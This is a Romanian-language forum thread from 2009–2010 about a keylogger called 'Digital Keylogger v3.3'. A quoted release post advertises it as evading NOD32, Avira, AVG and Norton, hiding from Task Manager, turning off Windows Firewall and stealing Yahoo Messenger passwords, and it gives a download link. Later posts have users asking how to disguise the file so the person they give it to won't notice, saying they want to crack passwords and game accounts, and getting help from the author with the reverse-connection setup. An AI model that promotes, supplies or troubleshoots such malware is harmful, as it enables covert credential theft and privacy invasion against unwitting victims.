SympleBoy22 Posted October 30, 2009 Report Posted October 30, 2009 Cumva securitatea firewallului este data la maxim?
p3tru Posted October 31, 2009 Report Posted October 31, 2009 Cumva securitatea firewallului este data la maxim?ca sa nu mint, exact cu 5 minute inainte sa citesc acest reply mi-am adus aminte de firewall
SympleBoy22 Posted October 31, 2009 Report Posted October 31, 2009 ca sa nu mint, exact cu 5 minute inainte sa citesc acest reply mi-am adus aminte de firewall Sa inteleg ca merge?
p3tru Posted October 31, 2009 Report Posted October 31, 2009 Sa inteleg ca merge?nu merge, daca mergea scriam "merge ;x" windowsu asta
cannabiss6 Posted December 10, 2009 Report Posted December 10, 2009 poti sa faci reupload? nu mai merge link
Nytro Posted December 10, 2009 Author Report Posted December 10, 2009 Cand o sa am timp, il recompilez si pun linkuri noi.
ohel Posted December 12, 2009 Report Posted December 12, 2009 Name: Digital KeyloggerVersion: 3.3Author: NytroReleased: 1 Februarie 2009Powered by: Romanian Security TeamWebsite: [RST] Romanian Security Team - Security ResearchVersiunea nedetectabila a aceluiasi keylogger cu cateva bug fixes.Trece de nod, avira, avg, norton, de restul nu stiu. Cel putin nod32 cu update la zi sigur nu il gaseste. Nu scanati pe virustotal... Stiti voi.Server size:- packed: 36.0 KB- unpacked: 112 KBScreenshot:Download:http://rapidshare.com/files/266457273/Digital_Keylogger_v3.3.exeOptiuni:- Nu apare in Task Manager la procese- Inchide Windows Firewall- Get keylog automaticaly- Gey keylog manual- Se conecteaza automat, trebuie decat sa fie clientul deschis- Close Y! pentru a fura parola de mess- Bla bla...Problema: Nu se pot conecta mai multe servere la acelasi client, o sa fac sa se poata. In plus o sa pastrez lungimea ultimei sectiuni a executabilului pe care serverul acesta o are stricata. Si mai fac si alta grafica... Timp sa am si plictisit sa fiu. nu merge linku....upload again pls
SympleBoy22 Posted December 12, 2009 Report Posted December 12, 2009 Cititi ma si voi posturile de mai sus.Nu mai faceti quote.O sa reuploadeze Nytro.Asteptati.
Nytro Posted December 12, 2009 Author Report Posted December 12, 2009 Am uitat. Recompilez si uploadez dupa ce termin Darky Binder v2.0.
SympleBoy22 Posted February 3, 2010 Report Posted February 3, 2010 Nu cred ca se mai ocupa de el.Face LINUX versions.
verdy_g Posted February 17, 2010 Report Posted February 17, 2010 Da... cea cu Numele administratorului, ip...Spunemi te rog asa. Am intrat in server. De acolo ce fac? Pana sa inchid serverul.Si vreau sa ascund daca se poate fereastra cand se deschide serverul daca se poateVreau sa stiu de ce uneori nu se deschide serverul. ( Nu apare acea fereastra)de unde iau si eu programul asta
Nytro Posted February 17, 2010 Author Report Posted February 17, 2010 Ce program?Cand am putin timp il recompilez dupa ce instalez VS6 pe VirtualBox. 1
ConraD Posted March 17, 2010 Report Posted March 17, 2010 Nytro cand faci ultima versiune de digital keylogger,o astept cu sufletul la gura!
Nytro Posted March 17, 2010 Author Report Posted March 17, 2010 Nu mai fac, nu am timp si nu vad rostul.
wEek1d Posted March 21, 2010 Report Posted March 21, 2010 cum modific alea cu Digital Keylogger Server v3.3 , ca daca ii dau la cineva o sa isi dea seama ((
Nytro Posted March 21, 2010 Author Report Posted March 21, 2010 Details? Nu mai stiu exact ce am pus acolo, dar nu se pot modifica. Poate doar cu un Hex Editor, manual. Daca mai faceam o versiune puneam sa se editeze acele informatii.
Suverior2 Posted June 3, 2010 Report Posted June 3, 2010 Hey Nytro cum sati spun nu merge Nu pot face legatura cu niemni am schimbat numele servarului sa nusi dea seama.II lam dat unuia si na aparut numele de la pc lui ip am dat si start keylogger si a zis ca nu sunt connectat ce trebuie sa fac sa pot face legatura cu persoana caruia i dau servaru ?
Nytro Posted June 3, 2010 Author Report Posted June 3, 2010 Si esti sigur ca l-a rulat? Si ca nu a fost blocat de firewall sau sters de antivirus? Ai rooter?
Suverior2 Posted June 3, 2010 Report Posted June 3, 2010 Da sunt foarte sigur si eu am oprit si ala am intrat cu team viwer la el in pc sa vad daca merge si napare nimic si nici mie
Suverior2 Posted June 3, 2010 Report Posted June 3, 2010 Amandoi avem totu oprit de 2 saptamani sa vad ce are si nu pot sami dau seama si e ff simplu de folosit mereu am vrut sa sparg parole dar nu merge nush ce are NU pot lua legatura cu nimeni nu merge doar mie intru in server siimi apar datele tot da asa nu merge la alti oare dc?
nobody_ro Posted June 4, 2010 Report Posted June 4, 2010 ... mereu am vrut sa sparg parole ...Eu de obicei folosesc un ciocan mai mare, nu da gres niciodata ...
Nytro Posted June 4, 2010 Author Report Posted June 4, 2010 Ti-am scris in PM. Daca e deja conectat cineva, nu se va mai conecta. Serverul se conecteaza la client. Cand dai built la server, in el e scris IP-ul curent, si la rulare, serverul incearca sa se conecteze la acel IP. Asta e baza, pot interveni destule probleme. Daca tu cu clientul ai rooter si nu ai port forwarding sau altele..
CalinCalin Posted July 4, 2010 Report Posted July 4, 2010 Nytro, hacku e foarte reusit, dar atata timp cat are acele details numa 1 care vede invers poate sa puna botu...cu hex editor nu am reusit (skillurile mele), sper ca ma poti ajuta cu treaba astanu am nevoie la mess.. ci doar pentru un joc si mi`ar fi tare de folos deoarece in ultima vreme nu mai am cum sa sparg 1 cont pentru ca acuma astia tin foarte mult la securitate, deci singura alternativa este klg pro al tauun pm cu id de mess pe care ESTI activ (intri) ar fi de folos